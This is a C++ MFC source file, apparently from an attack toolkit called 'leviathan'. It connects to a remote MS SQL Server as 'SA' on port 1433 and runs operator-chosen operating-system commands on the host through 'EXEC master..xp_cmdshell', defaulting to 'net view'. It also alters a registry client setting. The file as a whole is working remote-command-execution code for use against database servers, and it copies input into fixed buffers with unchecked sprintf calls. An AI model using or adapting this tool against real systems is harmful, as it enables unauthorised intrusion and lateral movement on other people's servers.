// SqlFlow.cpp : implementation file
//

#include "stdafx.h"
#include "leviathan.h"
#include "SqlFlow.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CSqlFlow dialog

	SQLCHAR User[15]="";
	SQLCHAR Pass[15]="";
	const int Port = 1433;
	SQLCHAR rowBuff[200]="";
	SQLINTEGER   iRowBuff;
	UCHAR Query[1500]="";
	SQLCHAR Database[4]="";
	SQLCHAR InConnectionString[1025]="";
	char inBuff[1025]="";	
	SQLRETURN nResult;
	SWORD     sLen;
	SQLHDBC   hDbc;         
	HSTMT  hStmt;
	SQLHANDLE hEnvironment;
	HKEY hKey;
	DWORD Type,Length = 9;

CSqlFlow::CSqlFlow(CWnd* pParent /*=NULL*/)
	: CDialog(CSqlFlow::IDD, pParent)
{
	//{{AFX_DATA_INIT(CSqlFlow)
	m_Command = _T("net view ");
	m_Pwd = _T("");
	m_User = _T("SA");
	m_Host = _T("");
	//}}AFX_DATA_INIT
}


void CSqlFlow::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CSqlFlow)
	DDX_Control(pDX, IDC_RESULT, m_Result);
	DDX_Control(pDX, IDC_DISCONNECT, m_Disconnect);
	DDX_Control(pDX, IDC_EXECUTE, m_Execute);
	DDX_Control(pDX, IDC_CONNECT, m_Connect);
	DDX_Text(pDX, IDC_COMMAND, m_Command);
	DDX_Text(pDX, IDC_PWD, m_Pwd);
	DDX_Text(pDX, IDC_USER, m_User);
	DDX_Text(pDX, IDC_SQLHOST, m_Host);
	//}}AFX_DATA_MAP
}


BEGIN_MESSAGE_MAP(CSqlFlow, CDialog)
	//{{AFX_MSG_MAP(CSqlFlow)
	ON_BN_CLICKED(IDC_CONNECT, OnConnect)
	ON_BN_CLICKED(IDC_EXECUTE, OnExecute)
	ON_BN_CLICKED(IDC_DISCONNECT, OnDisconnect)
	ON_BN_CLICKED(IDC_CLEAR, OnClear)
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CSqlFlow message handlers

void CSqlFlow::OnConnect() 
{
	UpdateData(TRUE);
	if (RegOpenKeyEx ( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\MSSQLServer\\Client\\ConnectTo", 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS)
		if(RegSetValueEx(hKey,"DSQUERY",0, REG_SZ , (unsigned char *)"DBMSSOCN", 9)!= 0)	
		{
			m_Result.AddString("Reg error.");
			return;
		}
	sprintf((char*)User,";UID=%s",m_User.GetBuffer(0));
	sprintf((char*)Pass,";PWD=%s",m_Pwd.GetBuffer(0));
	sprintf((char *)InConnectionString,"DRIVER={SQL Server};SERVER=%s,%d%s%s%s",m_Host.GetBuffer(0),Port,User,Pass,Database);
	m_User.ReleaseBuffer(-1);
	m_Host.ReleaseBuffer(-1);
	m_Pwd.ReleaseBuffer(-1);
	//m_Result.AddString((char *)InConnectionString);
	if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnvironment) != SQL_SUCCESS)
	{
		m_Result.AddString("SQLAllocHandle error.");
		return ;
	}
	if (SQLSetEnvAttr(hEnvironment, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
						SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
	{
		m_Result.AddString("SQLSetEnvAttr error.");
		return ;
	}
	if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,hEnvironment,(SQLHDBC FAR*)&hDbc)) != SQL_SUCCESS) 
	{
		m_Result.AddString("SQLAllocHandle");
		return ;
	}
	nResult = SQLDriverConnect(hDbc,NULL, InConnectionString,
									strlen((char *)InConnectionString), 
									(unsigned char *)inBuff,  1024, &sLen,
									SQL_DRIVER_COMPLETE_REQUIRED); 
	//m_Result.AddString((char *)InConnectionString);
		if(nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO)
		{
	 		 //m_Result.AddString("Connected.");
			SQLAllocStmt(hDbc,&hStmt);
		}else
		{
			m_Result.AddString("Not connected");
			return;
		}
}

void CSqlFlow::OnExecute() 
{
	UpdateData(TRUE);
	CSqlFlow::OnConnect();
	sprintf((char *)Query,"EXEC master..xp_cmdshell ' %s'",m_Command.GetBuffer(0));
	//m_Result.AddString((char *)Query);
	if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
	{
		m_Result.AddString("SQLExecDirect Error");
		return ;
	}
	while (nResult != SQL_ERROR) 
	{
      memset(rowBuff,0,99);
	  nResult = SQLFetch(hStmt);
      if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO)
	  {
         SQLGetData(hStmt, 1, SQL_C_CHAR, rowBuff, 100, &iRowBuff);
		 m_Result.AddString((char *)rowBuff);
      } else 
	      break;
	}
	CSqlFlow::OnDisconnect();
	UpdateData(FALSE);
}
void CSqlFlow::OnDisconnect() 
{
	SQLFreeHandle(SQL_HANDLE_DBC,&hDbc);
	SQLFreeHandle(SQL_HANDLE_ENV,&hEnvironment);
	SQLFreeHandle(SQL_HANDLE_STMT,&hStmt);	
}

void CSqlFlow::OnClear() 
{
	m_Result.ResetContent();	
}
